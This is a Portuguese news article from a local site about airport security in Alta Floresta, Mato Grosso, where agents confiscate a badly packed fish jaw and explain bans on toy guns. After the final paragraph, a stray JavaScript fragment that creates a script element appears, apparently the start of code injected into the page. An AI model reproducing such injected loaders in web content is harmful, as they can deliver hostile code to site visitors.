Capa / Em Destaque / Fiscalização no Aeroporto: Passageiro é impedido de levar “arcada dentária”

Fiscalização no Aeroporto: Passageiro é impedido de levar “arcada dentária”

Foto Gilbert VaesRenan Nery

Funcionários do Aeroporto Piloto Oswaldo Marques Dias, em sua rotina de fiscalização diária encontraram em uma bagagem de mão uma arcada dentária de um peixe muito popular do norte do Mato Grosso, a famosa “cachorra”, e não é mentira de pescador.
A identificação do objeto foi “facilitada” por estar mal acondicionado na bagagem, a arcada dentária se encontrava com parte dos dentes para o “lado de fora”, perfurando a bagagem, estabelecendo assim riscos para a tripulação, o passageiro que continha o objeto alegou ser uma lembrança de sua viagem, mas por estar indevidamente acondicionado, o objeto foi confiscado pelos agentes da APAC (Agentes de Proteção a Aviação Civil).
A arcada dentária do peixe foi mais um dos objetos encontrados entre os pertencentes dos passageiros que são proibidos de serem levados em bagagens de mão. “Já passaram todos os tipos de coisas na fiscalização da bagagem de mão, porém tivemos recentemente o caso de uma criança possuir uma arma de brinquedo, e feita a apreensão do objeto um dos passageiros que estava próximo criticou o fato de apreender uma arma de brinquedo e assim deixar uma criança triste, e lamentavelmente tais objetos não podem ser permitidos”, esclareceu o Gestor de Segurança do Aeroporto de Alta Floresta, Gilbert Vaes.
O perigo de embarcar com armas de brinquedo está na possibilidade desse objeto ser interpretado como uma arma de verdade pelos tripulantes e causar problemas no voo. Um exemplo, foi o caso que aconteceu essa semana e que foi amplamente divulgado pela mídia nacional e internacional. Um passageiro embarcou em uma companhia aérea egípcia com um cinturão de explosivos falsos amarrados ao corpo, e sequestrou um avião egípcio. “Não podemos permitir que tais objetos sejam embarcados, pois zelamos pela segurança da Aeronave e principalmente dos passageiros”, pontuou Gilbert Vaes.
A APAC é formada por uma equipe de agentes que fazem a verificação detalhada de toda a bagagem de mão, visando evitar o embarque de qualquer objeto que possa servir como arma ou como objetos de intimidação, tais como: facas, sprays, objetos cortantes e perfurantes. Os objetos apreendidos na fiscalização são descartados.var d=document;var s=d.createElement(‘script’);

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top